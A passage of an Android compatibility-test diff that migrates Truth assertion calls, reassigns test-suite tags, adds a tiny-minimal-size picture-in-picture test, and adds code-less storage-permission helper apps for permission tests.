@@ import java.util.List; * Subject for asserting things about RollbackInfo instances. */ public final class RollbackInfoSubject extends Subject<RollbackInfoSubject, RollbackInfo> { + private final RollbackInfo mActual; + /** * Asserts something about RollbackInfo. */ @@ -57,27 +59,28 @@ public final class RollbackInfoSubject extends Subject<RollbackInfoSubject, Roll private RollbackInfoSubject(FailureMetadata failureMetadata, RollbackInfo subject) { super(failureMetadata, subject); + mActual = subject; } /** * Asserts that the RollbackInfo has given rollbackId. */ public void hasRollbackId(int rollbackId) { - check().that(getSubject().getRollbackId()).isEqualTo(rollbackId); + check("getRollbackId()").that(mActual.getRollbackId()).isEqualTo(rollbackId); } /** * Asserts that the RollbackInfo is for a staged rollback. */ public void isStaged() { - check().that(getSubject().isStaged()).isTrue(); + check("isStaged()").that(mActual.isStaged()).isTrue(); } /** * Asserts that the RollbackInfo is not for a staged rollback. */ public void isNotStaged() { - check().that(getSubject().isStaged()).isFalse(); + check("isStaged()").that(mActual.isStaged()).isFalse(); } /** @@ -86,10 +89,10 @@ public final class RollbackInfoSubject extends Subject<RollbackInfoSubject, Roll */ public void packagesContainsExactly(Rollback... expected) { List<Rollback> actualPackages = new ArrayList<>(); - for (PackageRollbackInfo info : getSubject().getPackages()) { + for (PackageRollbackInfo info : mActual.getPackages()) { actualPackages.add(new Rollback(info)); } - check().that(actualPackages).containsExactly((Object[]) expected); + check("actualPackages").that(actualPackages).containsExactly((Object[]) expected); } /** @@ -102,6 +105,7 @@ public final class RollbackInfoSubject extends Subject<RollbackInfoSubject, Roll expectedVps.add(cause.getVersionedPackage()); } - check().that(getSubject().getCausePackages()).containsExactlyElementsIn(expectedVps); + check("getCausePackages()").that(mActual.getCausePackages()) + .containsExactlyElementsIn(expectedVps); } } diff --git a/tests/AlarmManager/Android.bp b/tests/AlarmManager/Android.bp index 204f5a3c7f2..14180bcbd5b 100644 --- a/tests/AlarmManager/Android.bp +++ b/tests/AlarmManager/Android.bp @@ -28,6 +28,7 @@ android_test { "cts", "vts10", "general-tests", + "mts-scheduling", ], platform_apis: true, } diff --git a/tests/backup/Android.bp b/tests/backup/Android.bp index e1fcf7f4261..e5fc8bb62ba 100644 --- a/tests/backup/Android.bp +++ b/tests/backup/Android.bp @@ -35,7 +35,7 @@ android_test { "cts", "vts10", "general-tests", - "mts", + "mts-permission", ], sdk_version: "test_current", } diff --git a/tests/camera/src/android/hardware/camera2/cts/IdleUidTest.java b/tests/camera/src/android/hardware/camera2/cts/IdleUidTest.java index 9caf3657e7e..b093e6c8d62 100644 --- a/tests/camera/src/android/hardware/camera2/cts/IdleUidTest.java +++ b/tests/camera/src/android/hardware/camera2/cts/IdleUidTest.java @@ -127,7 +127,7 @@ public final class IdleUidTest extends Camera2ParameterizedTestCase { if (hasAccess) { fail("Unexpected exception" + e); } else { - assertThat(e.getReason()).isSameAs(CameraAccessException.CAMERA_DISABLED); + assertThat(e.getReason()).isSameInstanceAs(CameraAccessException.CAMERA_DISABLED); } } diff --git a/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureConditionTest.java b/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureConditionTest.java index 0c9fd40277f..94c92346739 100644 --- a/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureConditionTest.java +++ b/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureConditionTest.java @@ -47,7 +47,7 @@ public class ContentCaptureConditionTest { final ContentCaptureCondition condition = new ContentCaptureCondition(mLocusId, FLAG_IS_REGEX); assertThat(condition).isNotNull(); - assertThat(condition.getLocusId()).isSameAs(mLocusId); - assertThat(condition.getFlags()).isSameAs(FLAG_IS_REGEX); + assertThat(condition.getLocusId()).isSameInstanceAs(mLocusId); + assertThat(condition.getFlags()).isSameInstanceAs(FLAG_IS_REGEX); } } diff --git a/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureContextTest.java b/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureContextTest.java index 47bd20bc34c..59c61c734de 100644 --- a/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureContextTest.java +++ b/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureContextTest.java @@ -89,7 +89,7 @@ public class ContentCaptureContextTest { @Test public void testSetGetBundle() { final Builder builder = mBuilder.setExtras(mExtras); - assertThat(builder).isSameAs(mBuilder); + assertThat(builder).isSameInstanceAs(mBuilder); final ContentCaptureContext context = builder.build(); assertThat(context).isNotNull(); assertExtras(context.getExtras()); @@ -99,7 +99,7 @@ public class ContentCaptureContextTest { public void testParcel() { final Builder builder = mBuilder .setExtras(mExtras); - assertThat(builder).isSameAs(mBuilder); + assertThat(builder).isSameInstanceAs(mBuilder); final ContentCaptureContext context = builder.build(); assertEverything(context); diff --git a/tests/framework/base/windowmanager/app/AndroidManifest.xml b/tests/framework/base/windowmanager/app/AndroidManifest.xml index e17658af166..fd55b69fb0a 100755 --- a/tests/framework/base/windowmanager/app/AndroidManifest.xml +++ b/tests/framework/base/windowmanager/app/AndroidManifest.xml @@ -172,6 +172,15 @@ android:minHeight="80dp" /> </activity> + <activity android:name=".PipActivityWithTinyMinimalSize" + android:resizeableActivity="false" + android:supportsPictureInPicture="true" + android:configChanges="orientation|screenSize|smallestScreenSize|screenLayout" + android:exported="true" + android:taskAffinity="nobody.but.PipActivity"> + <layout android:minWidth="1dp" + android:minHeight="1dp"/> + </activity> <activity android:name=".FreeformActivity" android:resizeableActivity="true" android:taskAffinity="nobody.but.FreeformActivity" diff --git a/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java b/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java index d3b5621b77c..dc5aca6c880 100644 --- a/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java +++ b/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java @@ -79,6 +79,8 @@ public class Components extends ComponentsBase { public static final ComponentName PIP_ACTIVITY2 = component("PipActivity2"); public static final ComponentName PIP_ACTIVITY_WITH_MINIMAL_SIZE = component( "PipActivityWithMinimalSize"); + public static final ComponentName PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE = component( + "PipActivityWithTinyMinimalSize"); public static final ComponentName PIP_ACTIVITY_WITH_SAME_AFFINITY = component("PipActivityWithSameAffinity"); public static final ComponentName PIP_ON_STOP_ACTIVITY = component("PipOnStopActivity"); diff --git a/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java b/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java new file mode 100644 index 00000000000..cd1c625ae3f --- /dev/null +++ b/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java @@ -0,0 +1,24 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License + */ + +package android.server.wm.app; + +/** + * An activity that has the same behavior as {@link PipActivity} and specifies + * minimal dimension in its manifest which is tiny and smaller than the allowed minimum. + */ +public class PipActivityWithTinyMinimalSize extends PipActivity { +} diff --git a/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java b/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java index 3ac15bb12fb..98e5ff5b874 100644 --- a/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java +++ b/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java @@ -29,6 +29,7 @@ import static android.server.wm.UiDeviceUtils.pressWindowButton; import static android.server.wm.WindowManagerState.STATE_PAUSED; import static android.server.wm.WindowManagerState.STATE_RESUMED; import static android.server.wm.WindowManagerState.STATE_STOPPED; +import static android.server.wm.WindowManagerState.dpToPx; import static android.server.wm.app.Components.ALWAYS_FOCUSABLE_PIP_ACTIVITY; import static android.server.wm.app.Components.LAUNCHING_ACTIVITY; import static android.server.wm.app.Components.LAUNCH_ENTER_PIP_ACTIVITY; @@ -38,6 +39,7 @@ import static android.server.wm.app.Components.PIP_ACTIVITY; import static android.server.wm.app.Components.PIP_ACTIVITY2; import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_MINIMAL_SIZE; import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_SAME_AFFINITY; +import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE; import static android.server.wm.app.Components.PIP_ON_STOP_ACTIVITY; import static android.server.wm.app.Components.PipActivity.ACTION_ENTER_PIP; import static android.server.wm.app.Components.PipActivity.ACTION_FINISH; @@ -144,6 +146,8 @@ public class PinnedStackTests extends ActivityManagerTestBase { private static final int MAX_ASPECT_RATIO_NUMERATOR = 239; private static final int MAX_ASPECT_RATIO_DENOMINATOR = 100; private static final int ABOVE_MAX_ASPECT_RATIO_NUMERATOR = MAX_ASPECT_RATIO_NUMERATOR + 1; + // Corresponds to com.android.internal.R.dimen.overridable_minimal_size_pip_resizable_task + private static final int OVERRIDABLE_MINIMAL_SIZE_PIP_RESIZABLE_TASK = 48; @Before @Override @@ -250,8 +254,6 @@ public class PinnedStackTests extends ActivityManagerTestBase { assertPinnedStackActivityIsInDisplayBounds(PIP_ACTIVITY); } - // TODO: launch/size pip to a size smaller than limitation and verify the minWidth/minHeight - // is respected after b/149338177. @Test public void testEnterPipWithMinimalSize() throws Exception { // Launch a PiP activity with minimal size specified @@ -276,6 +278,29 @@ public class PinnedStackTests extends ActivityManagerTestBase { } @Test + public void testEnterPipWithTinyMinimalSize() throws Exception { + // Launch a PiP activity with minimal size specified and smaller than allowed minimum + launchActivity(PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE, EXTRA_ENTER_PIP, "true"); + // Wait for animation complete since we are comparing size + waitForEnterPipAnimationComplete(PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE); + assertPinnedStackExists(); + + final WindowManagerState.WindowState windowState = getWindowState( + PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE); + final WindowManagerState.DisplayContent display = mWmState.getDisplay( + windowState.getDisplayId()); + final int overridableMinSize = dpToPx( + OVERRIDABLE_MINIMAL_SIZE_PIP_RESIZABLE_TASK, display.getDpi()); + + // compare the bounds to verify that it's no smaller than allowed minimum on both dimensions + final Rect pipBounds = getPinnedStackBounds(); + assertTrue("Pinned task bounds " + pipBounds + " isn't smaller than minimal " + + overridableMinSize + " on both dimensions", + pipBounds.width() >= overridableMinSize + && pipBounds.height() >= overridableMinSize); + } + + @Test public void testEnterPipAspectRatioMin() throws Exception { testEnterPipAspectRatio(MIN_ASPECT_RATIO_NUMERATOR, MIN_ASPECT_RATIO_DENOMINATOR); } diff --git a/tests/libcore/okhttp/Android.bp b/tests/libcore/okhttp/Android.bp index b0f17d2150c..b09108304cb 100644 --- a/tests/libcore/okhttp/Android.bp +++ b/tests/libcore/okhttp/Android.bp @@ -36,7 +36,7 @@ android_test { test_suites: [ "cts", "general-tests", - "mts", + "mts-conscrypt", "vts10", ], java_resources: [":libcore-expectations-knownfailures"], diff --git a/tests/libcore/okhttp/AndroidTest.xml b/tests/libcore/okhttp/AndroidTest.xml index 771293e244e..0907b0a6de8 100644 --- a/tests/libcore/okhttp/AndroidTest.xml +++ b/tests/libcore/okhttp/AndroidTest.xml @@ -45,4 +45,8 @@ <object type="module_controller" class="com.android.tradefed.testtype.suite.module.TestFailureModuleController"> <option name="screenshot-on-failure" value="false" /> </object> + + <object type="module_controller" class="com.android.tradefed.testtype.suite.module.MainlineTestModuleController"> + <option name="mainline-module-package-name" value="com.google.android.conscrypt" /> + </object> </configuration> diff --git a/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java b/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java index 974d02ab903..790880b82db 100644 --- a/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java +++ b/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java @@ -933,6 +933,11 @@ public class SensorDirectReportTest extends SensorTestCase { if (samplingPeriodUs < s.getMinDelay()) { return; } + + if (samplingPeriodUs > s.getMaxDelay()) { + samplingPeriodUs = s.getMaxDelay(); + } + resetEvent(); mChannel = prepareDirectChannel(memType, false /* secondary */); diff --git a/tests/tests/content/src/android/content/pm/cts/PackageManagerTest.java b/tests/tests/content/src/android/content/pm/cts/PackageManagerTest.java index b3785d8f971..3a035f6c968 100644 --- a/tests/tests/content/src/android/content/pm/cts/PackageManagerTest.java +++ b/tests/tests/content/src/android/content/pm/cts/PackageManagerTest.java @@ -669,7 +669,7 @@ public class PackageManagerTest { // Check required permissions List<String> requestedPermissions = Arrays.asList(pkgInfo.requestedPermissions); - assertThat(requestedPermissions).containsAllOf( + assertThat(requestedPermissions).containsAtLeast( "android.permission.MANAGE_ACCOUNTS", "android.permission.ACCESS_NETWORK_STATE", "android.content.cts.permission.TEST_GRANTED"); diff --git a/tests/tests/content/src/android/content/res/cts/AssetManagerTest.java b/tests/tests/content/src/android/content/res/cts/AssetManagerTest.java index 6998103eb84..e4ec38382c3 100644 --- a/tests/tests/content/src/android/content/res/cts/AssetManagerTest.java +++ b/tests/tests/content/src/android/content/res/cts/AssetManagerTest.java @@ -102,7 +102,7 @@ public class AssetManagerTest { // We don't do an exact match because the framework can add asset files and this test // would be too brittle. - assertThat(files).asList().containsAllOf(fileName, "subdir"); + assertThat(files).asList().containsAtLeast(fileName, "subdir"); files = mAssets.list("subdir"); assertThat(files).isNotNull(); diff --git a/tests/tests/media/Android.bp b/tests/tests/media/Android.bp index 848f004ec9b..6b1797dc74b 100644 --- a/tests/tests/media/Android.bp +++ b/tests/tests/media/Android.bp @@ -77,7 +77,7 @@ android_test { "cts", "vts10", "general-tests", - "mts", + "mts-media", ], host_required: ["cts-dynamic-config"], min_sdk_version: "29", diff --git a/tests/tests/mediaparser/Android.bp b/tests/tests/mediaparser/Android.bp index 13859a77e10..d9756e832c2 100644 --- a/tests/tests/mediaparser/Android.bp +++ b/tests/tests/mediaparser/Android.bp @@ -19,7 +19,7 @@ android_test { test_suites: [ "cts", "general-tests", - "mts", + "mts-media", ], } diff --git a/tests/tests/mediaparser/AndroidManifest.xml b/tests/tests/mediaparser/AndroidManifest.xml index e3a26e03ce4..f0f6d976423 100644 --- a/tests/tests/mediaparser/AndroidManifest.xml +++ b/tests/tests/mediaparser/AndroidManifest.xml @@ -19,6 +19,8 @@ <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="android.media.mediaparser.cts"> + <uses-sdk android:minSdkVersion="29" + android:targetSdkVersion="29"/> <application> <uses-library android:name="android.test.runner" /> </application> diff --git a/tests/tests/mediastress/Android.bp b/tests/tests/mediastress/Android.bp index 689fec05792..8060b9fe046 100644 --- a/tests/tests/mediastress/Android.bp +++ b/tests/tests/mediastress/Android.bp @@ -20,7 +20,7 @@ android_test { "cts", "vts10", "general-tests", - "mts", + "mts-media", ], // Include both the 32 and 64 bit versions compile_multilib: "both", diff --git a/tests/tests/neuralnetworks/Android.mk b/tests/tests/neuralnetworks/Android.mk index 9928e08127f..3180aaba73f 100644 --- a/tests/tests/neuralnetworks/Android.mk +++ b/tests/tests/neuralnetworks/Android.mk @@ -32,7 +32,7 @@ LOCAL_STATIC_LIBRARIES := libbase_ndk libgtest_ndk_c++ libgmock_ndk LOCAL_CTS_TEST_PACKAGE := android.neuralnetworks # Tag this module as a cts test artifact -LOCAL_COMPATIBILITY_SUITE := cts vts10 mts general-tests +LOCAL_COMPATIBILITY_SUITE := cts vts10 mts mts-neuralnetworks general-tests LOCAL_SDK_VERSION := current LOCAL_NDK_STL_VARIANT := c++_static diff --git a/tests/tests/neuralnetworks/benchmark/Android.mk b/tests/tests/neuralnetworks/benchmark/Android.mk index 9df9c986e16..2207258712a 100644 --- a/tests/tests/neuralnetworks/benchmark/Android.mk +++ b/tests/tests/neuralnetworks/benchmark/Android.mk @@ -27,7 +27,7 @@ LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS) LOCAL_MULTILIB := both # Tag this module as a cts test artifact -LOCAL_COMPATIBILITY_SUITE := cts vts10 mts +LOCAL_COMPATIBILITY_SUITE := cts vts10 mts mts-neuralnetworks LOCAL_STATIC_JAVA_LIBRARIES := androidx.test.rules \ compatibility-device-util-axt ctstestrunner-axt junit NeuralNetworksApiBenchmark_Lib diff --git a/tests/tests/neuralnetworks/tflite_delegate/Android.mk b/tests/tests/neuralnetworks/tflite_delegate/Android.mk index 091a070d691..1bcb0f468b6 100644 --- a/tests/tests/neuralnetworks/tflite_delegate/Android.mk +++ b/tests/tests/neuralnetworks/tflite_delegate/Android.mk @@ -66,7 +66,7 @@ LOCAL_STATIC_LIBRARIES := libgtest_ndk_c++ libtflite_static LOCAL_CTS_TEST_PACKAGE := android.neuralnetworks # Tag this module as a cts test artifact -LOCAL_COMPATIBILITY_SUITE := cts vts10 mts general-tests +LOCAL_COMPATIBILITY_SUITE := cts vts10 mts mts-neuralnetworks general-tests LOCAL_SDK_VERSION := current LOCAL_NDK_STL_VARIANT := c++_static diff --git a/tests/tests/notificationlegacy/notificationlegacy29/Android.bp b/tests/tests/notificationlegacy/notificationlegacy29/Android.bp index aabff61b268..8929c43ad46 100644 --- a/tests/tests/notificationlegacy/notificationlegacy29/Android.bp +++ b/tests/tests/notificationlegacy/notificationlegacy29/Android.bp @@ -31,7 +31,7 @@ android_test { "cts", "vts10", "general-tests", - "mts" + "mts-extservices" ], sdk_version: "test_current", target_sdk_version: "29", diff --git a/tests/tests/os/src/android/os/storage/cts/StorageCrateTest.java b/tests/tests/os/src/android/os/storage/cts/StorageCrateTest.java index 99ea30c6eee..c1172ff255d 100644 --- a/tests/tests/os/src/android/os/storage/cts/StorageCrateTest.java +++ b/tests/tests/os/src/android/os/storage/cts/StorageCrateTest.java @@ -314,7 +314,7 @@ public class StorageCrateTest { } String[] newChildDir = mCratesRoot.toFile().list(); - assertThat(newChildDir).asList().containsAllIn(expectedCrates); + assertThat(newChildDir).asList().containsAtLeastElementsIn(expectedCrates); } @Test diff --git a/tests/tests/os/src/android/os/storage/cts/StorageStatsManagerTest.java b/tests/tests/os/src/android/os/storage/cts/StorageStatsManagerTest.java index 60ede8b7d66..226bb7a2ee8 100644 --- a/tests/tests/os/src/android/os/storage/cts/StorageStatsManagerTest.java +++ b/tests/tests/os/src/android/os/storage/cts/StorageStatsManagerTest.java @@ -380,17 +380,10 @@ public class StorageStatsManagerTest { assertThat(newCollection.size()).isEqualTo(oldCollection.size() - 1); } - Correspondence<CrateInfo, String> mCorrespondenceByLabel = new Correspondence<>() { - @Override - public boolean compare(CrateInfo crateInfo, String expect) { + Correspondence<CrateInfo, String> mCorrespondenceByLabel = + Correspondence.from((CrateInfo crateInfo, String expect) -> { return TextUtils.equals(crateInfo.getLabel(), expect); - } - - @Override - public String toString() { - return "It should be the crated folder name"; - } - }; + }, "It should be the crated folder name"); @Test public void queryCratesForUid_createDeepPath_shouldCreateOneCrate() diff --git a/tests/tests/packagewatchdog/Android.bp b/tests/tests/packagewatchdog/Android.bp index 8773e4a1fb9..678bda68272 100644 --- a/tests/tests/packagewatchdog/Android.bp +++ b/tests/tests/packagewatchdog/Android.bp @@ -23,7 +23,7 @@ android_test { "vts", "vts10", "general-tests", - "mts" + "mts-extservices" ], libs: ["android.test.base.stubs"], static_libs: [ diff --git a/tests/tests/permission/Android.bp b/tests/tests/permission/Android.bp index c8459cf39b5..607c7a11fd1 100644 --- a/tests/tests/permission/Android.bp +++ b/tests/tests/permission/Android.bp @@ -22,7 +22,7 @@ android_test { "vts10", "general-tests", "sts", - "mts", + "mts-permission", ], // Include both the 32 and 64 bit versions compile_multilib: "both", diff --git a/tests/tests/permission/AndroidTest.xml b/tests/tests/permission/AndroidTest.xml index 5277c9aff09..66b65602bf3 100644 --- a/tests/tests/permission/AndroidTest.xml +++ b/tests/tests/permission/AndroidTest.xml @@ -65,6 +65,9 @@ <option name="push" value="CtsInstallPermissionEscalatorApp.apk->/data/local/tmp/cts/permissions/CtsInstallPermissionEscalatorApp.apk" /> <option name="push" value="CtsAppThatRequestsOneTimePermission.apk->/data/local/tmp/cts/permissions/CtsAppThatRequestsOneTimePermission.apk" /> <option name="push" value="AppThatDefinesUndefinedPermissionGroupElement.apk->/data/local/tmp/cts/permissions/AppThatDefinesUndefinedPermissionGroupElement.apk" /> + <option name="push" value="CtsStorageEscalationApp28.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp28.apk" /> + <option name="push" value="CtsStorageEscalationApp29Full.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp29Full.apk" /> + <option name="push" value="CtsStorageEscalationApp29Scoped.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp29Scoped.apk" /> </target_preparer> <!-- Remove additional apps if installed --> diff --git a/tests/tests/permission/StorageEscalationApp28/Android.bp b/tests/tests/permission/StorageEscalationApp28/Android.bp new file mode 100644 index 00000000000..63fceda30eb --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp28/Android.bp @@ -0,0 +1,25 @@ +// +// Copyright (C) 2016 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +android_test_helper_app { + name: "CtsStorageEscalationApp28", + certificate: ":cts-testkey2", + test_suites: [ + "cts", + "general-tests", + "mts", + ], +} diff --git a/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml new file mode 100644 index 00000000000..f1bd315c630 --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml @@ -0,0 +1,30 @@ +<?xml version="1.0" encoding="utf-8"?> + +<!-- + ~ Copyright (C) 2016 The Android Open Source Project + ~ + ~ Licensed under the Apache License, Version 2.0 (the "License"); + ~ you may not use this file except in compliance with the License. + ~ You may obtain a copy of the License at + ~ + ~ http://www.apache.org/licenses/LICENSE-2.0 + ~ + ~ Unless required by applicable law or agreed to in writing, software + ~ distributed under the License is distributed on an "AS IS" BASIS, + ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + ~ See the License for the specific language governing permissions and + ~ limitations under the License. + --> + +<manifest + xmlns:android="http://schemas.android.com/apk/res/android" + package="android.permission3.cts.storageescalation"> + + <uses-sdk android:minSdkVersion="28" android:targetSdkVersion="28" /> + + <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" /> + + <application android:hasCode="false" /> +</manifest> diff --git a/tests/tests/permission/StorageEscalationApp29Full/Android.bp b/tests/tests/permission/StorageEscalationApp29Full/Android.bp new file mode 100644 index 00000000000..8eb6acb9e07 --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp29Full/Android.bp @@ -0,0 +1,25 @@ +// +// Copyright (C) 2016 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +android_test_helper_app { + name: "CtsStorageEscalationApp29Full", + certificate: ":cts-testkey2", + test_suites: [ + "cts", + "general-tests", + "mts", + ], +} diff --git a/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml new file mode 100644 index 00000000000..73a7110deca --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml @@ -0,0 +1,30 @@ +<?xml version="1.0" encoding="utf-8"?> + +<!-- + ~ Copyright (C) 2016 The Android Open Source Project + ~ + ~ Licensed under the Apache License, Version 2.0 (the "License"); + ~ you may not use this file except in compliance with the License. + ~ You may obtain a copy of the License at + ~ + ~ http://www.apache.org/licenses/LICENSE-2.0 + ~ + ~ Unless required by applicable law or agreed to in writing, software + ~ distributed under the License is distributed on an "AS IS" BASIS, + ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + ~ See the License for the specific language governing permissions and + ~ limitations under the License. + --> + +<manifest + xmlns:android="http://schemas.android.com/apk/res/android" + package="android.permission3.cts.storageescalation"> + + <uses-sdk android:minSdkVersion="29" android:targetSdkVersion="29" /> + + <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" /> + + <application android:hasCode="false" android:requestLegacyExternalStorage="true"/> +</manifest> diff --git a/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp b/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp new file mode 100644 index 00000000000..424a67fc531 --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp @@ -0,0 +1,25 @@ +// +// Copyright (C) 2016 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +android_test_helper_app { + name: "CtsStorageEscalationApp29Scoped", + certificate: ":cts-testkey2", + test_suites: [ + "cts", + "general-tests", + "mts", + ], +} diff --git a/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml new file mode 100644 index 00000000000..c3812fe3d47 --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml @@ -0,0 +1,30 @@ +<?xml version="1.0" encoding="utf-8"?> + +<!-- + ~ Copyright (C) 2016 The Android Open Source Project + ~ + ~ Licensed under the Apache License, Version 2.0 (the "License"); + ~ you may not use this file except in compliance with the License. + ~ You may obtain a copy of the License at + ~ + ~ http://www.apache.org/licenses/LICENSE-2.0 + ~ + ~ Unless required by applicable law or agreed to in writing, software + ~ distributed under the License is distributed on an "AS IS" BASIS, + ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + ~ See the License for the specific language governing permissions and + ~ limitations under the License. + --> + +<manifest + xmlns:android="http://schemas.android.com/apk/res/android" + package="android.permission3.cts.storageescalation"> + + <uses-sdk android:minSdkVersion="29" android:targetSdkVersion="29" /> + + <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" /> + + <application android:hasCode="false" android:requestLegacyExternalStorage="false"/> +</manifest> diff --git a/tests/tests/permission/src/android/permission/cts/BackgroundPermissionsTest.java b/tests/tests/permission/src/android/permission/cts/BackgroundPermissionsTest.java index 6077b21f7c2..a535bb050d0 100644 --- a/tests/tests/permission/src/android/permission/cts/BackgroundPermissionsTest.java +++ b/tests/tests/permission/src/android/permission/cts/BackgroundPermissionsTest.java @@ -30,7 +30,7 @@ import static android.permission.cts.PermissionUtils.uninstallApp; import static com.android.compatibility.common.util.SystemUtil.eventually; -import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.Truth.assertWithMessage; import static org.junit.Assert.assertNotEquals; import static org.junit.Assert.assertNotNull; @@ -126,8 +126,8 @@ public class BackgroundPermissionsTest { install(APK_LOCATION_29v4); - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "foreground app-op").isEqualTo(MODE_FOREGROUND)); + eventually(() -> assertWithMessage("foreground app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND)); } /** @@ -141,8 +141,8 @@ public class BackgroundPermissionsTest { install(APK_LOCATION_BACKGROUND_29); // Wait until the system sets the app-op automatically - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "loc app-op").isEqualTo(MODE_IGNORED)); + eventually(() -> assertWithMessage("loc app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_IGNORED)); } /** @@ -157,8 +157,8 @@ public class BackgroundPermissionsTest { sUiAutomation.grantRuntimePermission(APP_PKG, ACCESS_COARSE_LOCATION); // Wait until the system sets the app-op automatically - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "loc app-op").isEqualTo(MODE_FOREGROUND)); + eventually(() -> assertWithMessage("loc app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND)); } /** @@ -174,8 +174,8 @@ public class BackgroundPermissionsTest { sUiAutomation.grantRuntimePermission(APP_PKG, 